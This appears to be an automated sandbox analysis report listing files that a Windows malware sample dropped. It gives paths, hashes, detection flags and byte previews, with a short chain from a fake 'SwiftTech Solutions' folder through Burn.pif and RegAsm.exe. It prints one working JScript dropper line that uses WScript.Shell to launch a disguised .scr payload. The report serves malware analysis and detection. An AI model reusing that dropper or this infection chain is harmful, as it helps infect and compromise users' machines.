Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js

Download File

Process:	C:\Users\user\AppData\Local\Temp\795933\Burn.pif
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	177
Entropy (8bit):	4.6754300733022065
Encrypted:	false
SSDEEP:	3:RiMIpGXIdPHo55wWAX+Ro6p4EkD52SCaSEngZo5uWAX+Ro6p4EkD52SCaSEbnMn:RiJBJHonwWDKaJkDPgywWDKaJkDPbnMn
MD5:	64CDC29814F3515300E449F93E253D1C
SHA1:	4F67DE35CBB8D369A0A49FAFDA597C3E2D78EB00
SHA-256:	E7C45DC29CAAE698A7F7F5C10A7151C5818BBBE87E549912D15AFE1A13F7E3E8
SHA-512:	B05E7A235F0410279AEB7669D2955351BC28541280091A1A7E312AF066ACD17DE45266A9732114EFCE66A43A3C66253CAB26554BD90F6BFD69F2392FDB6255AC
Malicious:	true
Preview:	new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\SwiftTech Solutions\\SwiftServe.scr\" \"C:\\Users\\user\\AppData\\Local\\SwiftTech Solutions\\w\"")

C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Download File

Process:	C:\Users\user\AppData\Local\Temp\795933\Burn.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.62028134425878
Encrypted:	false
SSDEEP:	12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:	18CE19B57F43CE0A5AF149C96AECC685
SHA1:	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:	A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\SwiftTech Solutions\w

Download File

Process:	C:\Users\user\AppData\Local\Temp\795933\Burn.pif
File Type:	data
Category:	dropped
Size (bytes):	982265
Entropy (8bit):	7.999771549475875
Encrypted:	true
SSDEEP:	24576:drZ01kDAX32KEOoPB4r8Tx5mM4xWvBwC0BiesYMVtTwfbtceLRixVupkk:dVqCAX3hO5W8Tx5mPxWVgGYmF0RsVu+k
MD5:	10EA180ED4B42783834A3B0E0D52FEA6
SHA1:	8C0F169740B6C1CC3C8A913372D76A85104EC1F6
SHA-256:	0646658F524828F9286939B4121B89EE2DD5A1D335480091DCAC9395367927E5
SHA-512:	2175CCB6F26D84547E3ABAEBA6D16D332F47288F10C4EF6C8CF94E86F1E148DFF6DD5AA61FF8807D06051BF2FA9FD785EE130D4F7D859C1D13513257A9C8D44A
Malicious:	false
Preview:	67...^jYY................J.&v.yi...$.w...o..r......%......9.R,1/>....-......1.......s...2....C....jd......6.R.YUYp.(s..... ...F-?..r......Z...".oc.1.3...f....3.......A./...'<.-....R....`\.......pe...d.I..>..R......#@3...FOp.%.5../...X."..lP...j..K..c...J...QyK...C66......<.GR`.a...L..........(.K'....F..J...i....-.y.d...!... o..8...........D...u=.$.<..k.;.C;.1qT.O7.[......z.sr5.....J.\...a.....v.^e...0`.F.....\|B.;y<...=-.V......U]M...........a..c...n2..4..Q.....D...!.Ij..@i.k<I.p...+...v...2...B..A.MrUm@E9.......c\.).<.[.Z...........3......%.7L)7.JO.......z2.4..s.VM./.4.I..5."..Isz..l)8.g.CY.v.VJ2..db....t....L{.^$j.,...2.EU............]/..o.w..1...\|.M.wZ..G.$C..d.O.x..Fr.9.d...U.Chw.es(Y.R:.K...;...Q..R.n.."/..>..8.0....e..5p._..-..3.$...b.#.C...k..2.^F>s...R.[....t.@.\|BZY(.K.M.z.b.F.H....Udb.'....u....JTP..w..G.C5R,.M..=...#...S.......th...K..B.H...,+V.B.Z}.C./........?Wc..hYL..x.v.^.1..^.>...Y;/Td.......$.8..3...`..rt.

C:\Users\user\AppData\Local\Temp\329C.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1812227
Entropy (8bit):	7.91904487657674
Encrypted:	false
SSDEEP:	24576:x9MlOjfoafONVCfIICRjD3STMdOlQaIhv/BlZAWguxDmTct90cJIvaQcT+1UnMoO:xDM7Zh+TMd/hv//SWbgTcnx0fq2NI9+
MD5:	09607648B95315F78A147FCAC628E63D
SHA1:	67716B6F3A40BF48D3319D6C080BF30A93A8B19C
SHA-256:	B8ED5A17150DA2A420CC39505357223261437D4E99CE94599A7FFDBBFE71E6CF
SHA-512:	2A11C6E4E64091F62C6843D462E8F83268B43D21D3489625389497D27083F96E570C854321A54FE29AC9ED3273297C1ADC417C45AABCA0972F4C2A8A483ED440
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......aKZe%46%46%46,R.6&46,R.6446%56.46>..6+46>..6$46>..6$46Rich%46........PE..L.....GO.................p....>..B...8............@...........................K......k....@.................................4........0G..[...........~..X(....?.H....................................................................................text....o.......p.................. ..`.rdata..b.......,...t..............@..@.data....f>.........................@....ndata....... ?..........................rsrc....[...0G..\..................@..@.reloc...2....K..4...n..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\795933\Burn.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	893608
Entropy (8bit):	6.62028134425878
Encrypted:	false
SSDEEP:	12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:	18CE19B57F43CE0A5AF149C96AECC685
SHA1:	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:	A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\795933\Burn.pif
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	65440
Entropy (8bit):	6.049806962480652
Encrypted:	false
SSDEEP:	768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
MD5:	0D5DF43AF2916F47D00C1573797C1A13
SHA1:	230AB5559E806574D26B4C20847C368ED55483B0
SHA-256:	C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
SHA-512:	F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P.....0.."........(......-.r...p.rI..p(....s....z....0..........(....~P.....o........(....n(.....(..........%...(....~(.....(..........%...%...(.....(.....(..........%...%...%...(....V.(......}Q.....}R.....{Q.....{R......0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......

C:\Users\user\AppData\Local\Temp\795933\z

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	982265
Entropy (8bit):	7.999771549475875
Encrypted:	true
SSDEEP:	24576:drZ01kDAX32KEOoPB4r8Tx5mM4xWvBwC0BiesYMVtTwfbtceLRixVupkk:dVqCAX3hO5W8Tx5mPxWVgGYmF0RsVu+k
MD5:	10EA180ED4B42783834A3B0E0D52FEA6
SHA1:	8C0F169740B6C1CC3C8A913372D76A85104EC1F6
SHA-256:	0646658F524828F9286939B4121B89EE2DD5A1D335480091DCAC9395367927E5
SHA-512:	2175CCB6F26D84547E3ABAEBA6D16D332F47288F10C4EF6C8CF94E86F1E148DFF6DD5AA61FF8807D06051BF2FA9FD785EE130D4F7D859C1D13513257A9C8D44A
Malicious:	false
Preview:	67...^jYY................J.&v.yi...$.w...o..r......%......9.R,1/>....-......1.......s...2....C....jd......6.R.YUYp.(s..... ...F-?..r......Z...".oc.1.3...f....3.......A./...'<.-....R....`\.......pe...d.I..>..R......#@3...FOp.%.5../...X."..lP...j..K..c...J...QyK...C66......<.GR`.a...L..........(.K'....F..J...i....-.y.d...!... o..8...........D...u=.$.<..k.;.C;.1qT.O7.[......z.sr5.....J.\...a.....v.^e...0`.F.....\|B.;y<...=-.V......U]M...........a..c...n2..4..Q.....D...!.Ij..@i.k<I.p...+...v...2...B..A.MrUm@E9.......c\.).<.[.Z...........3......%.7L)7.JO.......z2.4..s.VM./.4.I..5."..Isz..l)8.g.CY.v.VJ2..db....t....L{.^$j.,...2.EU............]/..o.w..1...\|.M.wZ..G.$C..d.O.x..Fr.9.d...U.Chw.es(Y.R:.K...;...Q..R.n.."/..>..8.0....e..5p._..-..3.$...b.#.C...k..2.^F>s...R.[....t.@.\|BZY(.K.M.z.b.F.H....Udb.'....u....JTP..w..G.C5R,.M..=...#...S.......th...K..B.H...,+V.B.Z}.C./........?Wc..hYL..x.v.^.1..^.>...Y;/Td.......$.8..3...`..rt.

C:\Users\user\AppData\Local\Temp\Activity

Download File

Process:	C:\Users\user\AppData\Local\Temp\329C.exe
File Type:	data
Category:	dropped
Size (bytes):	97280
Entropy (8bit):	7.998012438787752
Encrypted:	true
SSDEEP:	1536:7se5ICPk0HhHnqa0iDZFyzh8jwRIut2tltcuVoJ4Ew9eAmk4NbhmxucJlg0/hjD8:7xmB+hb7xuAtgZXAT4HN0pnA9
MD5:	BBA14B171FF3B70E2A450254D03A8AF3
SHA1:	54182C18EC17EBE100B31F1B1E70FA4D93A04D67
SHA-256:	4A43121D64001EBB9C173F888C2EA63C7A30394C4800B46D777A3B3EAF6D6D73
SHA-512:	2E7CE7974D5926DF5E8EC03B1AF3885692FF604C3EE4592BE10D0BDC4AE6CFEF4ABE85BA36B6902B25A9C0B32A67B1F81023A2074436769E036AE72A8BCD5BF5
Malicious:	false
Preview:	....~..fE%GH.h..%s.;..4..0..C..O+=....fb..a.r.,.UIc.].x.o\|.$P..A].%..I2!V-v...#+.......T....h.......\|.w.+..D....}..0.......[`...}ck{.....d.....1...k7P5.G...H.US.-....F....x_...V..8.Qy.0^.o.3..{,...MF.Z.....4.b...'....sXi.{.{..!.Oj..N...N....7...X"M..'.z.....R..7....X..T.XL{..=+j.;.&.N......QZg..p.T.[.......B....\|.p.3...<.5.E.6f['F.....q.r......x.......0..a.t....L.hb.K.j1.).A...kz.i/@..i.g.....@..C..au["....k.F..7...v,.....0.DZ..zvrH..h.#....N..I.%..5.....:.... ...<.......c/..7.&n...?......o..:.a..O..%F...,`...J...Cg.@r..gf.t.,..z..:}EAR- ..... (...G.b=.]...p..+.P..HHo.N.v1......qL..p.\.d...j.FJYDv...K-.).7.H+.......m....u.@M..#aX.....,... ..4c".@..1N.....c...N(. ...N.y.......W......f.K.UANp....Rg.Ew.......@.Y.b....!..N.P.Gg..c.%.t.Q.5,..W:\|.\|......8...G.T..p..>....`%......O. ..B2.'.h.-c...A....I..\.a8?j.\0..C....c}n..F(PB....M8l..D&1.......t..m:<.....:...$3^.\|...f(..^UX..Z..G..=S..i........he....._....V....f?.i.4..Y.......d.^H..L../..).`.

C:\Users\user\AppData\Local\Temp\Census

Download File

Process:	C:\Users\user\AppData\Local\Temp\329C.exe
File Type:	data
Category:	dropped
Size (bytes):	82944
Entropy (8bit):	7.997779052855597
Encrypted:	true
SSDEEP:	1536:Qchu/EvUWo90TylG32dR2EtQhqd7+F8j4U11HFUbAM++NUK19:Qhc3o9jlqaZ0y+F8j4UfUbvqKj
MD5:	B8E14D5CCA2982952E2D3AEAD8AD7462
SHA1:	EF98A4192AE814BD61FF605DA0478D14C0A7B3DE
SHA-256:	B2A429F10F4FD2C042AD6669985FDB5B744CE4A7FF4F094A3056EB50A0F2B23B
SHA-512:	E8A3C45BC9CDA7D52AEDB674E8C654CD54E57243FF954E859F34417A144BAF22A767881173AB6DBC867AB87FF825852659CD00C019EB6A5F480D81FD7B9F00E7
Malicious:	false
Preview:	..D%.. a.:BJ.._.......]9.!....vT'.+.......n."..`.l.j...l....'..D.&..;id?c..:._....=.R..).".....$...>o<f....7..6....P.z..+Ft6.P;x....8J~......q...x."..dr.Z5.I...0`..........\.$....Nl.z{D.9[.N..~..R`........f.W"../...n..Nb.S.U..<E............~..}..W2p....w.M.P.Cg..g....&.4JE_.NB\.B....hC......cB3n.. ..?`.s.......)?^7.M..d.;p.....:...!.@....K......U....:F.?-.3.P`'.I......7..j..........;:.......5...nq...!Qm..........l~..Na"..L$.......nXi.2_@X.1...... .X..f.\..._...:....e/.(.P^O6.D..`.(b.]U.SE.]..I.u.m?.{....ws^X..@.ajE..5.;..I..~0..7L1.5.D.Q.{v\kG1..J>.f>..h>@...V..b.....#...b...s..T7.\.s.r....,q.(..;......k}Kg....go.n@...S..a._.gWQ.`.D..]lr^c..u...a..7.8.q/Nz...Q.U?v......]........C72"..&..qZd3..R...'.......z.1..n.$VV.......m.a..{."..<`q....N>..Q..:%.%C.?/9.4....b..M.2.16uE.!.1.oG.+.L.8.`d.....a...(8.z......k G.8..&.T...-.tq..=...p...y..w..j.\As{.>....4..y..P.x...S.".)W.[.9......1...`HF...n...\|............MG.....Z".....R..7...4O..D.2.\

C:\Users\user\AppData\Local\Temp\Church

Download File

Process:	C:\Users\user\AppData\Local\Temp\329C.exe
File Type:	data
Category:	dropped
Size (bytes):	72704
Entropy (8bit):	7.997607902659952
Encrypted:	true
SSDEEP:	1536:wSLAgh+Bxz4bb3va50p4zGVrP9ZTccRtf5bpMRFMN4F237oh:BfUxEbbfk0qqV79+2fAy4U3sh
MD5:	CA804309B954E5A5EE2B1D22C7AE382A
SHA1:	71F7210BAF4FDE1FA6C92BB33043999BD38DABE3
SHA-256:	2BF2EBA5745C6E7874A6F521318DC0DF9C669FF51F3DF1725FFE9C6882287B98
SHA-512:	70F691C0F82199D3E181E3C5A3B494F620ED6604BDB4109A797D3272DB252570061F5AFE8924D4F5E28576BE5EFE1AFADC4CF2F0F98FEC5E9A776B2E1577F6A5
Malicious:	false
Preview:	67...^jYY................J.&v.yi...$.w...o..r......%......9.R,1/>....-......1.......s...2....C....jd......6.R.YUYp.(s..... ...F-?..r......Z...".oc.1.3...f....3.......A./...'<.-....R....`\.......pe...d.I..>..R......#@3...FOp.%.5../...X."..lP...j..K..c...J...QyK...C66......<.GR`.a...L..........(.K'....F..J...i....-.y.d...!... o..8...........D...u=.$.<..k.;.C;.1qT.O7.[......z.sr5.....J.\...a.....v.^e...0`.F.....\|B.;y<...=-.V......U]M...........a..c...n2..4..Q.....D...!.Ij..@i.k<I.p...+...v...2...B..A.MrUm@E9.......c\.).<.[.Z...........3......%.7L)7.JO.......z2.4..s.VM./.4.I..5."..Isz..l)8.g.CY.v.VJ2..db....t....L{.^$j.,...2.EU............]/..o.w..1...\|.M.wZ..G.$C..d.O.x..Fr.9.d...U.Chw.es(Y.R:.K...;...Q..R.n.."/..>..8.0....e..5p._..-..3.$...b.#.C...k..2.^F>s...R.[....t.@.\|BZY(.K.M.z.b.F.H....Udb.'....u....JTP..w..G.C5R,.M..=...#...S.......th...K..B.H...,+V.B.Z}.C./........?Wc..hYL..x.v.^.1..^.>...Y;/Td.......$.8..3...`..rt.

C:\Users\user\AppData\Local\Temp\Comment

Download File

Process:	C:\Users\user\AppData\Local\Temp\329C.exe
File Type:	data
Category:	dropped
Size (bytes):	88064
Entropy (8bit):	7.998075556360778
Encrypted:	true
SSDEEP:	1536:g8qKQOWjKyYD0m1Oj+W9yWjYM+q64p+K4tTk/0soChgUzOavW+LzPWi:MOpb69yWf+Wp+9tT3soCaUiT+3T
MD5:	013F925B73327EFD125DFBECB73DC8DC
SHA1:	B489689ED6EE34D086E5479377824273D1DE500E
SHA-256:	087691E52EE660058CA52E175274ED7926CEC42CB6A39A3A75A323D924F9F7BC
SHA-512:	8467307E785E0DDAF8231161D3E858802433FBABB1651DDD7B7F51BFF7CC80986B32140401AD4EAA94E3C4BA501C9015F638EFE76D0AE2843126D019A34EFBEC
Malicious:	false
Preview:	.Z3.B...@.....=d....y.Y.........D....2.<..I....h.T.o...c....1AH.zrZ....-.=........B....?d.(.....q.....\|..."F:sl.4.g..".AgZ.`.Ov........g.0'N...m.L}U2.9F.l......o...7........).w..N.<y.....ny.@.{..wON.0k.,m..4I...{."..s..=.?Y.\.Y.}c..r.~.rj..B..3.p.#.......0k...0......vF.....L....t.n..s.`8.K.......Q..K%...Q;SM.fl......0Ld..k..u(j.va...X...)(..h3e1...K....RR.e.c8...x....;.......T.J.....p...8..Fr.U..?+A../!(.0..-g.Fj.#g.>..VL..K.....c.</...y..0y.....j...Y.:.Nm{..2...7.=......6..H@H...D....j........h.."....Y...........3....'L.mV..Z<[.. uk..U.L.%>S..&....dt..\|b...........B....u..1C.+.5.\...`.zU`Z....I.p.@.-/...}.\..Uu.........j.<..f?A.x`B9.s/j.y..+......g(......).f....cpu.$y..?.F#...M!.)CD..]P..4......HFo,.....O...({\|..m.E9n.r^.I..mt}..@ ;#l...&F..1)..'.Z....C\..H...h.......]C.5..s....\....'..m".O\|....'.S\w..<9..].]..vE..=_...\|..$..Q._&..'q..+.A...?...h..p$.........B./...u.......v..V..3%<.U.rb.X['.......(....3;...Q..........

C:\Users\user\AppData\Local\Temp\Convenience

Download File

Process:	C:\Users\user\AppData\Local\Temp\329C.exe
File Type:	data
Category:	dropped
Size (bytes):	96256
Entropy (8bit):	7.997978623526869
Encrypted:	true
SSDEEP:	1536:CCMAlXrlqcn2434zusbqkMxD+IwwVZzyqTK57kLoaGIyyhsvFXsiWU7ccz0+7Q8m:3pRqc24ZsbqFxD+Iww8j57DIybvFXscy
MD5:	6001CE78DE384572B68FB85289FD1A32
SHA1:	24AD6E005F0EA9E2101F681BEB3B6782B052A438
SHA-256:	2A843412595DAAC3C13661E9862B4DA769BC5C29675948E89BA2EAF2781227B1
SHA-512:	60D31C57D3C02E0E1C95441E5F99AF8A7A5DEDFA0E35CF3A8D39812205362E237D2FD2D6784E2B25BA143575EAC86257EAA02C2E2EEE1A89B1CC9137EDA04690
Malicious:	false
Preview:	.~?..?..j.V....v..jC.ye....BE.h..I.TMS?.g..+.....$y....X..3.N]..a...b_v.Is/..54;..g......m[p.B.....w...-#..51.\|.{9?.>.....1.U..........T....{."..6!...G....'<"Y.'z.......+..s.. .e/P............=[sH..l..... .q......$E..m.i.....t().u4U.r..t3....K...m.'.uK.i$...ym....z..>..t..v.P&...m...9.8.. ..aU..[...g,....t...O..L.X...\|k0..W3...`.....C.Y`.T.LL..k.c.}>..a..l.9.........!k...BA"..3P%B.[..).v..3!..."&...e.........]...w..k..........d....l.P.J@.a..=...U.0.v..X...\z....wW..k.....TU.....T......%...o..B.5>d.CvX..v.4.d.N.xa......k?.h.x.....x.D%..w..]4...\|.p.D..h.[.r9Fr.U.q.k&$.,....O}..4...Me"...-...].Y..{4u.9........Z.vV.E....;ux..P^.9kp.. .(.h../..&..W...S.X.H.=..:v.^..D.,B.'+>;..W.v?...n.\eBp.SvC..L..i..f....Ae.......o,z.....A...$+~.._.....:.U.j...H.}.R..\|a.v^....9!.6.[....a!y.0..n......B.T..`....c..a...........".....n..s...k:b....&.7..$e1;..Am@{..(.;)wBC._...h....4."3.yK.hCRdO..[K._.o.~.!.Q.#.,.ds.7...nYqZ&.5..rQ......^.@1....Hs..)..E.....P

C:\Users\user\AppData\Local\Temp\DFA6.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	3639176
Entropy (8bit):	7.398157669285365
Encrypted:	false
SSDEEP:	98304:H+sv/t4BT7/Z/U6NVQFamv1oOgEoYYkTZ9:H+it4x7RcsmFxv+OgEoYvTZ9
MD5:	17D51083CCB2B20074B1DC2CAC5BEA36
SHA1:	0A046864AD4304F63DBDE5AC14D3DC05CFB48D46
SHA-256:	681EEECECD77EB1433111641C33C8424EAF2C1265E2D4A7E4D6F023865FB5D94
SHA-512:	7DA8A2FD0321231C17FDDF414BF1D5A03D71DBC619F68958FF1D167003F972920F0F3C830B8A25AA715DF4FCC044D88D739B6EAB115A5B0B0A53852A70F4238A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................H....2......V.......`....@...........................7.......7..........@............................... ...P...v1..........f7..!......Dd..................................................................................CODE....`F.......H.................. ..`DATA....d....`.......L..............@...BSS.....Q............f...................idata... ......."...f..............@....tls.....................................rdata..............................@..P.reloc..Dd.......f..................@..P.rsrc....v1..P...v1.................@..P..............7......f7.............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\Dod

Download File

Process:	C:\Users\user\AppData\Local\Temp\329C.exe
File Type:	data
Category:	dropped
Size (bytes):	893002
Entropy (8bit):	6.621101849839293
Encrypted:	false
SSDEEP:	12288:qpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:qTxz1JMyyzlohMf1tN70aw8501
MD5:	69EDE0A51A7D1650A3ED96D98577BB3F
SHA1:	D098719F7DA8EF5D5ABA198DCA14DCD72DCA4D68
SHA-256:	9268BEF9D3863B86C1E03FF41429C969EF779B6FE2F54A4BA1BCE307F6E6F620
SHA-512:	A1340432183BB71AD18D1F334BAC5C91B2ACF23FBAE76D4BC690DC52C3CBB368455C64813A40B52C1422D68A8575762FE7DEBF8C335DA9D1D8D7879ED781BFDA
Malicious:	false
Preview:	.@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.........................................................................................................................................................................................................................................................................................................DaL.....h..C..\...Y...L..h..C..K...Y..N..h..C..:...Y.h..C......Y..<C..h..C......Y.....h..C......Y.Q.>...h..C......Y..sL.Q.@...sL.P.9...h.C......Y..G..h.C......Y...(..h.C.....Y..4..h.C.....Y...L..2...h.C.....Y................SVW..j.[..l............Ky.Nl.....N(....V.;...Y_..^[...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd....j....................F\|U............[...U......Ky......3........................l.....p.....t.....x.....\|...........................f.........................................................

C:\Users\user\AppData\Local\Temp\Literature

Download File

Process:	C:\Users\user\AppData\Local\Temp\329C.exe
File Type:	data
Category:	dropped
Size (bytes):	634
Entropy (8bit):	4.075945748714752
Encrypted:	false
SSDEEP:	12:h5gyeyGSGCbTQxbs/0pQHPZdsLq6h1b5zGbWCBl9r:h5deyGSnPQxqtPMLqCj8WCBl9r
MD5:	4ECEE850B8293A7C15664093986C596E
SHA1:	8E9BA7E708090D42CEDD740EFF6500DED8FAC8FC
SHA-256:	E57E5F4E648C800D3F7D45B7051BB181AF0E35DA4152D723DE8911B109DEBD38
SHA-512:	99C864904434FAED7C271EA6E6B0237F05EE7E7A0FE33D2C64FFB00F5A92A3C8E093C8290844D1EFCC4603BE15A0FE0CC105F986AA064C2E23742742EB42504B
Malicious:	false
Preview:	tagsnegotiationthreadadobe..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@.

C:\Users\user\AppData\Local\Temp\Maps

Download File

Process:	C:\Users\user\AppData\Local\Temp\329C.exe
File Type:	data
Category:	dropped
Size (bytes):	54272
Entropy (8bit):	7.996739395420604
Encrypted:	true
SSDEEP:	1536:+T2yS+gnEbba/4iysew6x/2FAz7v5c7Sd:NKhbm4J12K5c7a
MD5:	DF84F1C9236B94386C2020967BDD22AF
SHA1:	397074E32D1591317E565EA5AC58EE3B9DBB2E8B
SHA-256:	75C842D7BB27085B14E2AE07BB3994C237B423B9934062AA0F21B8549A631BDC
SHA-512:	0946B8D727EF963E04F4E5887678C92F0D887FEF14D90953262E7189E757AC3A431A632CCF2ABD218CF6478A47E023BBCECB7BEA7D160EFDABE33EC3A524B53F
Malicious:	false
